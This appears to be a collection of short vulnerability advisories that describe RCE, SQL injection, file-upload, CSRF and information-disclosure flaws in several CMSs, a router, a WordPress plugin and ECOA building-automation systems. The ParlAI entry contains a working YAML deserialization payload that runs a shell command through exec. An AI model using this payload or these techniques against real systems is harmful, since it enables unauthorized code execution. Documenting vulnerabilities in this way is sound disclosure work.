ImpressCMS is a multilingual content management system for the web. It contains an endpoint that allows remote access and is misconfigured, causing a security vulnerability. An authenticated user can exploit this vulnerability to execute arbitrary code on the server.
Evolution CMS 3.1.6 is vulnerable to Remote Code Execution (RCE) when an authenticated user with access to the manager page sends a malicious POST request. This allows an attacker to execute arbitrary code on the server.
A vulnerability in Seowon 130-SLC router allows an unauthenticated attacker to execute arbitrary commands without authentication as admin user. To exploit this vulnerability, the attacker only needs to enter the router IP and port (if available) in the request. The result of the request is visible on the browser page.
Support Board 3.3.3 is vulnerable to multiple SQL injection vulnerabilities. The vulnerabilities exist in the status_code, department, user_id, and conversation_id parameters of the ajax.php file. An attacker can exploit these vulnerabilities to gain access to the database and execute arbitrary SQL commands.
This exploit allows an attacker to upload a malicious file to the server, which can be used to execute arbitrary code on the server. The exploit is possible due to the lack of proper input validation in the application's upload functionality. The attacker can use the application's login credentials to gain access to the application and upload the malicious file.
ParlAI was vulnerable to YAML deserialization attack caused by unsafe loading which leads to Arbitrary Code Execution. Create the following PoC file (exploit.py): import os; from parlai.chat_service.utils import config; exploit = """!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('xcalc')"""; open('config.yml','w+').write(exploit); config.parse_configuration_file('config.yml'); Execute the python script ie, python3 exploit.py
This exploit allows an attacker to upload a malicious file to the vulnerable Wordpress plugin Download From Files 1.48. The vulnerability exists due to insufficient validation of the uploaded file type. An attacker can upload a malicious file with a .php4 or .phtml extension and gain remote code execution on the server.
The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide the latest in Human Machine Interface (HMI) technology for monitoring and controlling management. The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. The ECOA SmartHome II is a web-based home automation system that allows users to control and monitor their home environment from any internet access point in the world.
ECOA Building Automation System is vulnerable to an information disclosure vulnerability. This vulnerability allows an attacker to download the configuration of the system, which can be used to gain access to the system. The affected versions are ECOA ECS Router Controller - ECS (FLASH), ECOA RiskBuster Terminator - E6L45, ECOA RiskBuster System - RB 3.0.0, ECOA RiskBuster System - TRANE 1.0, ECOA Graphic Control Software, ECOA SmartHome II - E9246, and ECOA RiskTerminator.
ECOA Building Automation System is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can exploit this vulnerability by sending a malicious request to the vulnerable system. This malicious request can be used to perform various actions such as changing the system configuration, modifying user accounts, and executing arbitrary code. The attacker can also use this vulnerability to gain access to sensitive information stored on the system.